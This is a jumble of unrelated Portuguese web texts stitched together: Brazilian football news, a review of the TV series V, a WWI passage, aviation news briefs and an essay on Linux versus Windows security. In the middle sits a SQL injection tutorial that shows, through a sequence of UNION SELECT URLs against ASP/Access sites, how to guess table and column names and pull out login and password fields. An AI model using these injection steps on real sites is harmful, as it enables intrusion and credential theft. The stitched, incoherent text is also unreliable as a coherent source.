Fonte: Gazeta Esportiva

O árbitro Evandro Rogério Roman não relatou a expulsão do técnico Mano Menezes na súmula da partida entre Corinthians e Flamengo, disputada no domingo, no estádio Brinco de Ouro da Princesa. Mas denunciou a invasão de campo de um torcedor, que trocou agressões com o assistente Alessandro Álvaro Rocha de Matos.

O Corinthians, portanto, corre o risco de ser julgado com base no artigo 213 (deixar de tomar providências capazes de prevenir e reprimir desordens em sua praça de desporto) do Código Brasileiro de Justiça Desportiva (CBJD). A pena pode ser uma multa de R$ 10 mil a R$ 200 mil e a perda do mando de campo de uma a dez partidas.

Como agravante, está registrado o arremesso de um objeto no gramado do Brinco de Ouro da Princesa.

Além do Corinthians, o zagueiro Chicão provavelmente precisará se defender no STJD. O jogador recebeu cartão vermelho contra o Flamengo e deverá responder ao artigo 250 (praticar ato desleal ou inconveniente durante a partida ) do CBJD, com pena de um a três jogos de suspensão.

Como resta apenas uma rodada para o término do Campeonato Brasileiro, o Corinthians e Chicão só cumprirão as suas punições em 2010 caso sejam realmente considerado culpados. Já Mano Menezes dificilmente irá a julgamento.

Após uma bela escorregada no episódio anterior (A Bright New Day), essa semana V veio com tudo aquilo que o primeiro episódio prometeu. Explosões, manipulações, desconfianças, escolhas e beijos sem graça. Eu estou tão decepcionado com a atuação de Logan Huffman, o Tyler que me pergunto se ele morrerá na série. Será que demora?

A correria dessa semana vai para Erica (Elizabeth Mitchell) e sua desconfiança em Ryan (Morris Chestnut). Tudo na série tem que dar certo o mais rápido possível. É, eu sou exigente. Ryan atira em Combs (Craig Fraser) para salvar Erica e rola aquele silêncio de “Olha só, posso confiar nele”, e depois a Erica faz a mesma coisa com Ryan, salvando a pele dele de outro V maluco e acontece o mesmo silêncio. Isso nem é mais clichê, é cafona. Mas eu torço tanto para a série dar certo que nem ligo!

O relacionamento entre Erica e Tyler vai de mal a pior. O adolescente deslumbrado com o “amor” de Lisa (Laura Vandervoort) deu as costas para a mãe e partiu pra nave V para conhecer a mãe da loirinha, Anna (Morena Baccarin), que já manipulou a mente do garoto mostrando aquilo que ele gosta e falando aquilo que ele quer ouvir, que ele será uma pessoa importante caso fique ao lado dos V’s. É como Erica disse, os humanos são previsíveis e os aliens sabem disso.

Anna tem poderes, é isso? Como assim, “benção”? Aqueles humanos que receberam a benção, o monge, a mulher, são V’s disfarçados de humanos, né?Fiquei um pouco confuso e não quero me sentir sozinho nessa.

Que fazer com a sede de vingança do Georgie (David Richmond-Peck)? Ele vai acabar colocando em risco todo o grupo por causa disso. Quer dizer, já levou uma bala por isso. Ainda bem que o padre Jack (Joel Gretsch) já foi para a guerra no Iraque e soube fazer o curativo no colega. Padre Jack é meu personagem favorito. Onde mais um padre já foi para guerra no Iraque não uma, mas duas vezes e ainda guarda sua arma na igreja? Além do que sabe bater e derrubou o V careca com um belo gancho de direita! Já disse que o padre Jack é meu personagem favorito? Forças, Jack, esse ferimento de hoje não há de ser nada!

E quem diria o bebê híbrido será de Ryan e Valerie! Eu estava torcendo para ele vir de Lisa e Tyler porque são adolescentes e poderiam abordar o tema da gravidez na adolescência, o que seria ótimo para passar a mensagem de não fazer sexo sem camisinha e o risco de vir a dar a luz um bebê aberração. Ok, parei.

Enquanto isso, na nave de Anna, Joshua (Mark Hildreth, que já foi a voz de Terry Bogard nas animações de Fatal Fury!) teve que retirar a pele, ou seja, matar seu amigo David (Ryan Kennedy), que se entregou como assassino de Dale (Alan Tudyk) para benefício dos rebeldes. Anna já desconfia que Joshua é o informante da Quinta Coluna. Nos resta saber quem é esse John May e o que ele está fazendo, porque o tanto de nave que está só aguardando o sinal de Anna para invadir nosso planeta não é brincadeira, é melhor ele ter um bom plano guardado na manga. Não querendo ser chato, mas o que esse bando de alien veio fazer no nosso planetinha? Just asking…

Eu só espero que V engrene de vez. Até agora o que vimos foram só esforços de manter o público, porém nada de muito surpreendente aconteceu. Mas ainda tenho esperanças!

Caramba, que bagulho doido!!! Nunca vi isso: Ontem, domingão, no jogo Corinthians X Flamengo pela penúltima rodada do Brasileirão 2009, tudo estava parado para o flamenguista Léo Moura bater um pênalti.. mas antes todos tiveram que observar a invasão de campo de um torcedor doidão.. até aí, tudo normal, mas como podemos ver no vídeo logo abaixo, o bandeirinha mais doidão ainda cola no torcedor e começa a trocar socos e pontapés com o indivíduo!! Haha, que viagem!! Vai entender essa doida arbitragem brasileira… hahah

Rota de invasão e de fuga dos alemães e de onde foram pressionados (clique p/ ampliar)

Durante a invasão do território belga, o forte exército alemão encontrou uma resistência muito bem fortificada na cidade de Liège, mas seguiram rapidamente rumo a França. Com essa invasão germânica o império britânico decidiu decidiu intervir na mesma afim de ajudar a Tríplice Entente, pois era o signatário do Tratado de Londres e estavam comprometidos a protege-los contra uma nova dominação e manter toda soberania belga. Para Grã-Bretanha portos de Antwerp e Oostend, localizados na Bélgica, eram de muita importância para serem dominados por um império hostil ao país… talvez até ao continente! Por isso a Grã-Bretanha enviou seu exército para a Bélgica afim de atrasar o avanço alemão.

De começo os alemães obteram a vitória na qual é conhecida como Batalha das Fronteiras. Mas com os ataques da Rússia à Prussia Oriental o exército alemão se viu obrigado a deslocar-se, que já estava planejando o avanço na Frente Ocidental. Após a derrota da Rússia em uma série de confrontos conhecidos como Segunda Batalha de Tannenberg e o deslocamento imprevisto dos alemães para combater a Rússia, as forças francesas conseguiram montar uma contra-ofensiva junto as forças inglesas que conseguiram parar os alemães a caminho de Paris, onde na Primeira Batalha do Marne forçaram os alemães tomarem uma postura defensiva e serem incapacitados, sendo uma vitória Franco-Britânica

Durante o recuo dos alemães para o lado oeste em direção ao mar e cada vez sendo mais neutralizados e sem conseguirem se impor, foram sendo cavadas trincheiras que se revelariam muito importantes.

Atenção: Os fatos descritos no vídeo não ocorrem em sistemas Unix-like, como GNU/Linux, Free BSD, Open BSD e Mac OS.

A RPG Magazine chegou em sua sexta edição!

Nesta você vai ver:
- Zelda (raças e talentos do game).(d20/OGL)
- Rancho Path of the Skinwalker, o local mais bizarro da Terra.(d20/OGL, Storyteller, Trevas/Arkanum e Invasão)
- Garotas no RPG
- NPCs Fast Food – Peça pelo número!
- Traços para personagens (d20/OGL)
…e muito mais!

Não perca!

http://www.4shared. com/file/ 155878256/ d511661c/ RM6.html

É de graça!

Fonte: Orc Stronghold

Esse metodo de injeções voce encontra apenas em maquinas windows rodando asp.net .

Tenho tal site:
www.site.com.br/view_noticia.asp?id_tb_noticia=132'

Com aspas no fim da string me retorna o erro ” Syntax error in string in query expression ‘minha_query_e_string”. “
Então o que devemos fazer é achar o nome da tabela, só que por meio de chute ( brute ) .
Para saber se achou a tabela correta se aparecer o erro “The Microsoft Jet database engine cannot find the input table or query ‘Renan’. Make sure it exists and that its name is spelled correctly.” é porque não encontrou ainda .
O erro que procuramos para confirmar a tabela correta é “The number of columns in the two selected tables or queries of a union query do not”
Exemplo:

login,logins,usuario,usuarios,etc…
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+login
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+logins
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+usuario
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+usuarios
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+tb_usuario
Achamos

No caso se achei a tabela nos retornaria outra mensagem como ” The number of columns in the two selected tables or queries of a union query do not ” , ou seja que o numero de tabelas não corresponde aquela tabela…

Vamos achar as colunas da seguinte maneira :
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+tb_usuario
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1+from+tb_usuario
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2+from+tb_usuario
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2,3+from+tb_usuario
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2,3,4+from+tb_usuario
Erro
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2,3,4,5+from+tb_usuario
Achamos
etc…

Até nos retornar alguma string na pagina e não mais o erro.
Se achei a tabela e o numero de colunas , vamos achar o nomes das colunas , no caso se as strings de respostas da pagina seria 2 e 4 . Então :
www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,login,3,4,5+from+tb_usuario

www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,senha,3,4,5+from+tb_usuario

ou

www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,login,3,senha,5+from+tb_usuario

——————————–//—————————-

Quanto aos erros de consulta varia conforme a linguagem utilizada de alguns hosts porem o significado é o mesmo .
Exemplo pt_br – en

en-> Syntax error in string in query expression ‘minha_query_e_string”.
pt_br->Erro de sintaxe na seqüência de caracteres na expressão de consulta ‘minha_query_e_string”.

en-> The Microsoft Jet database engine cannot find the input table or query ‘Renan’. Make sure it exists and that its name is spelled correctly.
pt_br->O mecanismo de banco de dados Microsoft Jet não encontrou a tabela de entrada ou consulta ‘Renan’. Certifique-se de que ela existe e de que seu nome está digitado corretamente.

en-> The number of columns in the two selected tables or queries of a union query do not
pt_br->O número de colunas nas duas tabelas ou consultas selecionadas de uma consulta união não coincidem.

bY _Mlk_

Webjet chega a 20 aviões e fortalece malha

Boeing 737 da Webjet (Foto: Aidan Formigoni / Clique para ampliar)

As duas últimas aeronaves que a Webjet receberá este ano chegam no dia 25, e a empresa fechará 2009 com 20 aviões em sua frota. Segundo o diretor comercial Davidson Botelho, os dois Boeing serão usados para reforçar as malhas para Salvador, Recife, Fortaleza, Porto Alegre e Rio de Janeiro. A companhia continua com a estratégia de não ter novos destinos e sim consolidar os dez já operados.

A expectativa de taxa de ocupação para novembro e dezembro é acima dos 70%. Os voos do Santos Dumont são os com maior rentabilidade, apesar de a ponte SDU-GRU ainda ter potencial para crescer mais. São Paulo é o melhor mercado e a disputa pelo segundo lugar é grande entre Rio, Porto Alegre, Brasília e Salvador.

Botelho também disse que o programa Vai Voando, lançado na Abav para viagens programadas, com parcelamento em 12 vezes, já conta com 400 passageiros. Eles retiram os bilhetes depois de pagarem as prestações.

OceanAir garante quatro A319 para 2010 e faz suspense

O diretor executivo da OceanAir, Renato Pascowitch, confirmou a chegada de quatro A319 na frota da empresa em 2010. Um em março, começando a operar em abril, outro em maio, o terceiro no fim do semestre e o quarto na segunda metade do ano. Todos irão operar na ponte Rio-São Paulo. “2010 será um ano de muitas novidades e surpresas”, diz Pascowitch, anunciando somente que a tão esperada mudança de marca sairá no próximo ano. Haverá novidades também no posicionamento na América do Sul, principalmente depois da anunciada parceria entre a Avianca, do mesmo grupo da OceanAir, e a Taca. A OceanAir também estuda voltar a operar no Interior de São Paulo, principalmente no Noroeste do Estado. O interior é um dos três principais mercados emissores para a aérea.

Secretaria de Desenvolvimento Sustentável defende cobrança de taxa aeroportuária 

A Secretaria de Desenvolvimento Sustentável da Secretaria de Assuntos Estratégicos (SAE) da Presidência da República está lutando pela volta da cobrança de 3% sobre o valor das passagens aéreas. De acordo com o subsecretário Alberto Carlos Lourenço Pereira, a taxa poderia ser revertida em prol da aviação regional, através de subsídios para as empresas.

“É necessário restaurar alguma forma de subsídio cruzado, especificamente para a [as empresas que operam na] região amazônica”, afirmou Pereira, que quês estimular especialmente a região amazônica. A declaração foi dada durante uma audiência pública realizada pela Comissão da Amazônia, Integração Nacional e de Desenvolvimento da Câmara dos Deputados.  Para ele, as distâncias entre as cidades do estado e a baixa renda da população amazônica encarecem as passagens regionais, já que reduz a demanda.

A idéia defendida por Pereira é a implementação de uma taxa entre 1% e 3%, que abasteceria um fundo ligado à aviação. “O antigo fundo [Fundo Aeroviário, extinto na década de 90] havia sido criado por meio de decreto-lei. O Poder Judiciário entendeu que esse era um imposto que não poderia ter sido estabelecido por meio de decreto e exigiu a aprovação de uma lei com esse fim”.

840 a bordo dos A380 da Air Austral 

A Air Austral confirmou encomenda para dois superjumbos A830, da Airbus, que vão transportar mais de 800 pessoas nas primeiras versões configuradas totalmente em classe econômica do maior avião de passageiros do mundo. A companhia aérea da ilha La Réunion, informou que encomendou as aeronaves configuradas para transportar 840 passageiros e planeja usá-las entre Paris e o território francês no Oceano Índico a partir de 2014. O A380 entrou em serviço em 2007 e é projetado para carregar 525 passageiros em três classes ou 850 pessoas quando seus dois andares são ocupados por assentos de classe econômica. Até agora, compradores do avião vinham se concentraNdo em atrair passageiros abastados com facilidades como camas e chuveiros na primeira classe, o que faz a capacidade ficar em torno de 500 passageiros.

Paris inaugura serviço de controle em aeroportos por impressão digital 

Um dos terminais do aeroporto Charles de Gaulle, em Paris, inaugurou um dispositivo que permite que os passageiros evitem o habitual controle dos agentes, efetuando-o em uma máquina de leitura do passaporte e da impressão digital. A inauguração ocorreu na segunda-feira (16). O sistema facilita um “controle automático que oferece ao viajante uma autonomia completa e procura uma fluência apreciável no embarque, com um excelente controle dos serviços de imigração”, apontou a sociedade que administra os aeroportos parisienses, em comunicado. O dispositivo será instalado progressivamente até o final do ano em outros terminais do aeroporto Charles de Gaulle e em Orly, o segundo principal de Paris, ao sul da capital. Mais adiante, o equipamento também será utilizado em plataformas aeroportuárias de outras grandes cidades europeias. O aparelho estará “situado junto às prateleiras de controle clássicos da polícia fronteiriça, tanto para a chegada quanto para a saída dos voos”, segundo o comunicado.

Operação “pente fino” no GIG 

oliciais civis da Delegacia Especial de Apoio ao Turismo (Deat) realizaram, nesta última quinta-feira, a ação denominada Operação Inquietação, no terminal 1 do Aeroporto Internacional Antonio Carlos Jobim, que visava reprimir a atuação de taxistas irregulares e cambistas, que costumam abordar turistas naquele terminal. De acordo com o delegado titular daquela delegacia, Fernando Vila Pouca de Sousa, foram apreendidos R$14.000,00 e U$1.600,00. Três pessoas foram detidas. Dez carros foram multados pela guarda municipal. Os envolvidos responderão em liberdade por câmbio ilegal e crime contra a economia popular.

Infraero anuncia novo diretor comercial

O Conselho de Administração da Infraero aprovou o nome de Geraldo Moreira Neves para o cargo de diretor comercial da estatal, em substituição a Fernando Nicácio da Cunha Filho, que retorna ao quadro de profissionais da empresa, assumindo o comando da Superintendência Regional do Nordeste, sediada em Recife. Assim como Nicácio, o novo diretor integra uma diretoria executiva toda formada por empregados do quadro da Infraero.

Funcionário de carreira da empresa há 25 anos, Geraldo Moreira Neves exercia o cargo de superintendente de Auditoria Interna e já desenvolveu trabalhos nas áreas de Planejamento e Gestão e de Controle Empresarial. Geraldo Moreira Neves é formado em Administração Pública e de Empresas pela União Pioneira de Integração Social. Tem MBA em Administração de Empresa, pela Universidade de Brasília, além de ter participado de diversos cursos de gestão aeroportuária.

Aeroporto do Galeão (RJ) tem novo superintendente

André Luís Marques de Barros é o novo superintendente do Aeroporto Internacional do Rio de Janeiro Galeão-Tom Jobim. Barros tomou posse no último dia 16, substituindo Mário Jorge Fernandes de Oliveira, que será o novo superintendente da recém criada Superintendência Regional do Sudeste, com sede em Belo Horizonte. Barros é funcionário de carreira da Infraero desde 1994 e já atuou como supervisor do Aeroporto Internacional de Brasília, gerente comercial e de Operações da Superintendência Regional Brasília.

Hawker anuncia banda larga para jatos médios

Hawker 850XP (Foto: Jetphotos.net / Clique para ampliar)

A Hawker Beechcraft Corporation selecionou dois sistemas de conectividade da Aircell para a sua linha de jatos executivos médios. A partir de 2010, os clientes que receberem seus jatos Hawker 750 e 900XP poderão escolher o sistema para equipar suas aeronaves com acesso à internet durante o voo. Qualquer uma das duas instalações vai permitir a conexão através de equipamentos com acesso Wi-Fi, como PDAs e laptops, para trocar e-mails, navegar na web, ver vídeos ou acessar redes para baixar arquivos, da mesma forma como fariam no escritório ou em qualquer outro ponto com acesso à rede. Os centros de serviço da companhia também poderão realizar as instalações nos modelos Hawker 800XP e 850XP, que já estão em operação. A empresa é representada no Brasil pela Líder Taxi Aéreo.

Tap economiza até 15 milhões de euros em combustível

De acordo com o publicado na imprensa portuguesa, a Tap conseguiu economizar no ano passado 15 milhões de euros ao aumentar a eficiência na utilização de combustível. Somado à queda do preço do combustível, a companhia poderá voltar a fechar o ano com lucro. O grupo Tap, entrentando, acredita que, mesmo que feche no vermelho este ano, as perdas serão menores do que as registradas em 2008, quando os prejuízos chegaram a 285 euros.

Air Italy organiza road show de divulgação dos novos voos do Nordeste para Itália   

A Air Italy organizará um road show de promoção e divulgação dos novos voos on-line e regulares a partir do Nordeste para a Itália, em várias cidades, a partir do próximo dia 23. Começando em Salvador, o road-show termina dia 27, em Maceió. Estão sendo convidados, em cada cidade, os maiores players, além de empresas com volume corporativo para a Itália e Europa, além de membros do governo.

Ocean Air disponibiliza ofertas de voos para Brasília 

A Ocean Air está com ofertas nas tarifas de ida ou volta para Brasília. Entre as ofertas, Rio de janeiro a partir de R$ 161,00 e Belo Horizonte a partir de R$ 175,00. A compra pode ser efetuada em 12 parcelas até 31/11/2009. A promoção está válida para os bilhetes com emissão de 17 de novembro a 23 de novembro e embarque de 18 a 30 de novembro.

Para mais informação, ligue 4004-4040 ou acesse www.oceanair.com.br .

NHT quer operar com aeronaves maiores

A regional brasileira NHT Linhas Aéreas, hoje operando uma frota de seis bimotores checos Let 410 UVP, de 19 assentos, tem planos para adquirir aeronaves de maior porte. No primeiro semestre deste ano a NHT transportou 26.039 passageiros. O problema é que a maioria dos aeroportos servidos pela NHT recebem sem problema os aviões Let, mas não podem operar aeronaves de maior porte. Caso elas sejam adquiridas a companhia teria de inaugurar novas linhas, esbarrando então com a concorrência de suas irmãs maiores.

Air Vanuatu introduz ATR-72-500

A pequena empresa Air Vanuatu pretende usar bimotores ATR72-500 em viagens de mais de 120 minutos sobre o Pacífico com destino a Nova Caledônia e Ilhas Fiji. Os aviões foram escolhidos pela transportadora por sua maior capacidade de passageiros pela autonomia superior, que permite explorar linhas tão longas como os novos destinos.

Acionistas do Alasca compram empresa

Cento e vinte mil acionistas privados do Alasca uniram esforços e compraram ações da firma Pegasus Aircraft Maintenance, que assegura suporte técnico para aviões cargueiros em Anchorage. A empresa presta serviços para a Fedex, responsável por 80% dos pousos semanais de aviões de carga na cidade. A firma cujas ações foram negociadas está avaliada em US$ 330 milhões.

Lockheed tem planos para espiões

A norte-americana Lockheed Martin identificou um promissor nicho de negócios no leasing (aluguel) de aviões-espiões para países cujas forças aéreas não tem recursos para adquirir essas aeronaves dispendiosas. Tal conclusão deriva dos ensaios com o protótipo modificado de um jato “Gulfstream III”, acompanhados com interesse por diversos países que necessitam de aeronaves desse tipo. Aviões espiões desse porte derivam das especificações do programa ACS – Aerial Common Sensor, do Exército dos Estados Unidos, vencido pelo brasileiro Embraer ERJ-145 e depois anulado. Para a Lockheed dois tipos de jatos podem ser adaptados para essa tarefa, dentro dos seus planos: o Gulfstream 350 e o Bombardier Q400.

Rolls-Royce e Honeywell prolongam acordo

A inglesa Rolls Royce e a norte-americana Honeywell prolongaram por mais dez anos o acordo 50/50 que assegura à Aerospace Products International a distribuição de partes e componentes de reposição para o motor CTS800, usado em helicópteros pequenos a turbina.

Controlador militar invade pista do GIG

“Pelo menos dois aviões tiveram de arremeter, hoje, quando estavam prestes a pousar numa das pistas do aeroporto internacional Tom Jobim. A manobra ocorreu por causa da atitude inesperada de um sargento controlador de voo que invadiu a pista. O militar estava participando de uma marcha de treinamento, em área ao lado do local onde pousam as aeronaves, na via de circulação de viaturas, junto de outros colegas quando, inesperadamente, saiu da tropa sem autorização e correu em direção à pista de pouso. O tumulto durou cerca de dez minutos, entre 10h40 e 10h50 da manhã, e a torre de controle mandou que os aviões que estavam em processo de aproximação arremetessem por motivos de segurança. O Comando da Aeronáutica confirmou o incidente e informou que o militar “descumprindo ordens do oficial que comandava o exercício, saiu da tropa sem autorização e correu em direção à pista de pouso”.

Há uma certa tendência de muitos acreditarem que não existem vírus para sistemas operacionais abertos, como o GNU/Linux. Isso não é uma verdade absoluta. Na verdade, existem cerca de 1000 vírus conhecidos vírus para GNU/Linux (contra cerca de 6 milhões – e subindo – deles para os sistemas janelas), incluídos aí os rootkits, worms e scripts para invasão.

E isso é motivo para alarmes? Na verdade, não. Uma questão relevante sobre a existência de malwares é o impacto que tais programas têm no sistema infectado. Os vírus são desenvolvidos para explorar falhas de segurança dos sistemas. Descobrir falhas de segurança em sistemas proprietários é um pouco mais difícil do que em sistemas abertos, porque, no primeiro, o cracker precisa fazer uma engenharia reversa para “recuperar” o código fonte. No segundo, o código fonte está disponível para qualquer pessoa.

Auditoria de código.

O que parece uma desvantagem para o sistema aberto, na verdade, é uma absurda vantagem. Enquanto que, nos sistemas fechados, o cracker faz a engenharia reversa, ou outros métodos, descobre as falhas e cria maneiras de explorá-las para, somente depois, o vírus ser descoberto pelos pesquisadores e empresas de segurança, e medidas sejam tomadas para, primeiro, contornar (antivírus), e depois corrigir a falha (correções e atualizações), nos sistemas abertos, o código é auditado constantemente por milhares de desenvolvedores voluntários ao redor do mundo. Isso permite que as falhas sejam descobertas e corrigidas com mais rapidez. O mesmo trabalho que um cracker teria de fazer para descobri-las, já é feito diariamente por muitas pessoas. Além de descobrir um código defeituoso, ele teria de procurar se esse defeito já não está documentado, pois se estiver, a correção estará na próxima atualização, com certeza. Nos sistemas fechados, a velocidade de pesquisa dos códigos e de correção é absurdamente maior, o que significa que, mesmo que a falha seja descoberta, não significa que será corrigida imediatamente. Isso expõe o sistema a ataques que a explorem.

Isso também significa que, nos sistemas abertos, os crackers estão no mesmo passo dos desenvolvedores, ou um passo atrás, mas estão sempre um ou dois passos à frente nos sistemas proprietários.

Atualizações e correções.

As atualizações de segurança em sistemas abertos é feita da mesma forma que em sistemas fechados, ou seja, através do download de correções, ou de versões novas do software com defeito. Ocorre que, nos sistemas proprietários, temos uma fragmentação das fontes de software, ou seja, são vários fornecedores diferentes, trabalhando de maneira independente, nem sempre coordenada e, por vezes, concorrentes. Isso causa problemas do tipo ocorrido recentemente, em que uma correção de segurança do Internet Explorer, lançada pela M$, abriu brechas de segurança no Navegador Mozilla Firefox para janelas. Além disso, as correções são feitas independentemente, ou seja, cada um é responsável pelo seu pedaço: o antivírus, o sistema operacional, o pacote de escritório, o navegador, o cliente de email, o pacote gráfico, os jogos, o firewall, etc.

Nos sistemas abertos, isso é bastante minimizado, já que todas as atualizações são disponibilizadas nos repositórios oficiais. Também são automáticas, mas estão todas agrupadas e podem ser feitas de uma vez. Há coordenação entre as equipes de desenvolvimento através do responsável pela distribuição. Programas “não oficiais” podem ser instalados e ter sua atualização feita em separado, mas são poucos os casos, já que cada distribuição já inclui tudo, ou quase tudo, que é necessário para a maior parte das pessoas.

Exposição a ataques.

Há um mito que diz que apenas existem mais vírus para janelas porque o GNU/Linux é bem menos utilizado. Ou seja, o janelas é mais visado.

Isso é uma meia verdade. Se fosse possível comprovar essa afirmação, poderíamos supor seria proporcional a disponibilidade de malwares para os dois sistemas. Recentemente, foi publicada uma matéria sobre a taxa de penetração de cada um dos sistemas operacionais. O janelas (em todas as suas versões) ficou com aproximadamente 90%, O GNU/Linux com 1%, e o Sistema da Maçã com cerca de 5%. Seria, portanto, lógico supor que dos milhões de vírus conhecidos, a proporção fosse semelhante, mas não é o que acontece. Os vírus para GNU/Linux respondem por cerca de 0,16% do total de vírus conhecidos, número semelhante aos do Sistema da Maçã, sistema proprietário cujo desenvolvimento foi baseado em Unix.

Dos vírus conhecidos para Sistema da Maçã e GNU/Linux, não se comprovou que algum deles causasse transtornos semelhantes aos causados pelos que atingem o janelas. Além disso, a forma de considerar a segurança em sistemas Unix-like, como o GNU/Linux e o Sistema da Maçã, é completamente diferente e bem mais aprimorada. Numa instalação padrão, a exposição a ataques desses sistemas é consideravelmente menor. O que significa que se você pegar um CD e instalar uma distribuição qualquer do GNU/Linux em um computador conectado diretamente à Internet, a possibilidade de invasão é quase nula. O mesmo computador com uma instalação padrão do sistema janelas XP tem um tempo médio e resistência de 90 segundos. Ou seja, se você formatar a sua máquina e instalar o janelas XP nela, se ela estiver na Internet, você tem, em média, 90 segundos para instalar todas as atualizações de segurança, antivírus, antispyware, firewall, etc., o que é virtualmente impossível para qualquer “usuário comum”.

O janelas, ao contrário dos sistemas Unix-like, não foi originalmente concebido para trabalhar em rede. A demanda pela conectividade, na época do DOS+janelas 3.1, fez com que a M$ lançasse a versão 3.11 do janelas, com recursos de rede. A empresa tentou impor seu protocolo NetBeui como padrão para as redes locais, mas não conseguiu porque o TCP/IP já estava bem consolidado, e era utilizado na Internet restrita da época. Durante algum tempo, as redes locais não eram conectadas à Internet e trafegavam NetBeui. Quando começou a aparecer a necessidade de conectar essas redes à Internet, elas começaram a trafegar ambos os protocolos e, por fim, o NetBeui foi abandonado. As versões do janelas seguintes, não mudaram o conceito original. Hoje o janelas é altamente conectável, mas, como originalmente a segurança do sistema foi pensada para máquinas isoladas, quando muito conectadas em redes locais, por uma questão de compatibilidade com as versões anteriores e pelo custo de desenvolvimento, o conceito se propagou até os dias de hoje.

Custos de desenvolvimento e estratégia de marketing.

O custo de desenvolvimento de um sistema operacional completo pode chegar à casa de alguns bilhões de dólares. Por mais rica que uma empresa seja, um investimento desse tamanho é algo impraticável. Empresas como Petrobras, por exemplo, quando constroem uma refinaria de 2 ou 3 bilhões de dólares, invariavelmente procuram se associar a outras empresas e buscar financiamento de longo prazo em bancos, para o empreendimento. Vejam bem, uma refinaria pode ficar pronta em cerca de 2 ou 3 anos e tem um prazo de algumas dezenas de anos para pagar o financiamento e amortizar o investimento, além de dar lucro aos acionistas.

O que podemos dizer de um sistema operacional? Com a velocidade imposta para que uma versão de um sistema operacional proprietário seja substituído, seria necessário investir muitas centenas de milhões de dólares por ano no desenvolvimento de sistemas completamente novos para resolver o problema de segurança. Mas, a cada versão da família janelas, vemos as mesmas alegações de que o sistema novo é mais seguro que o antigo, fatos “comprovados” por pesquisas de cunho duvidoso e declarações de “especialistas” dos quais nunca se ouviu falar. O fato é que nunca se cria um sistema novo. Ela apenas se recicla códigos dos sistemas antigos, remodelando o velho para “criar o novo”, oferecendo um visual agradável para que o marketing atinja seus objetivos. É necessário que o ciclo seja curto para garantir os lucros altos. Portanto, não há tempo nem disponibilidade orçamentária, ou de financiamento, para a criação de um sistema novo, sem vícios herdados dos anteriores. Logo, o fato do janelas não ser um sistema seguro não se deve a uma questão de filosofia de código, mas a uma questão econômica. Se, mesmo com um sistema ruim, mantém-se a hegemonia do mercado, não há motivos econômicos para melhorar substancialmente o sistema, já que há quem o compre e o use sem grandes esforços de marketing. Além disso, existe uma “indústria da segurança” por trás disso. Além da M$, empresas como McAfee, Symantec, Trend Micro, entre outras, ganham fortunas oferecendo soluções paliativas para os problemas estruturais do janelas. Não espere que o janelas 7 seja muito melhor em termos de segurança do que seus antecessores, pois um sistema inseguro, mas hegemônico, é tudo o que a M$ e dezenas de empresas de segurança precisam para manter os acionistas felizes, e os usuários iludidos, mas igualmente felizes.

Os custos de desenvolvimento do kernel do Linux foi estimado em cerca de 614 milhões de dólares, e o de uma distribuição GNU/Linux típica em 1,2 bilhões de dólares. Esse capital não é investido por uma única empresa, mas diluído entre milhares (talvez milhões) de empresas e pessoas comuns ao redor do mundo, que contribuem com um pouco para que o sistema final chegue ao que se espera. Por isso é possível oferecer um sistema seguro a um preço irrisório. Não existe a preocupação com um ciclo de vida curto para garantir os lucros. Na verdade, a preocupação é exatamente oposta: ter um sistema estável e seguro para que se possa oferecer serviços constantes aos clientes. Sempre que uma versão nova do janelas é lançada, há uma demanda geral por novos treinamentos, novos equipamentos, novas “expertises“. No GNU/Linux, o ciclo é muito maior. Isso significa que quem usa uma versão 7.04 do Ubuntu, por exemplo, também usará uma versão 9.10, sem grandes dificuldades, porque na essência o sistema é o mesmo, mas as inovações se traduzem em mais compatibilidade, mais funcionalidades, mais segurança. Também não há grandes preocupações com a atualização do parque de máquinas porque a versão 9.10 rodará na maior parte das máquinas que rodavam a versão 7.04, por exemplo. Finalmente, não haverá a necessidade de uma urgente atualização do conhecimento dos técnicos de suporte, já que em essência, as mudanças são focadas na inovação, ou seja, não há mudança no conceito.

Aqui podemos ver uma situação curiosa: No sistema proprietário, não há mudança num conceito ruim que é perpetuado para que o “produto” continue a gerar lucros com mudanças “cosméticas”. Isso é bom para a empresa desenvolvedora, para as empresas de software incluídas no ecossistema. Não é tão bom para os técnicos porque precisam investir constantemente em treinamento, nem para os usuários que além do treinamento devem arcar com os custos do modelo (licenças de software diversas, treinamento constante, prejuízos decorrentes da insegurança do sistema, etc.). No sistema livre, o conceito originalmente bom, não tem a necessidade de ser modificado em profundidade, o que justifica mudanças que focam na inovação. Isso é bom para o ecossistema produtivo como um todo, já que diminui os custos tanto de desenvolvimento como o de treinamento de técnicos e usuários.

Como você pode observar, no sistema proprietário, a carga econômica fica com o consumidor final, bem como o ônus das deficiências do sistema. No sistema aberto, a carga é diluída entre todos e não há grandes ônus para nenhum dos envolvidos.

A questão comportamental.

Há uma tendência dos técnicos em afirmar que nenhum sistema é seguro, e que boa parte da segurança depende de quem o utiliza. Isso pode ser ou não uma verdade. Eu discordo de que isso seja uma verdade absoluta.

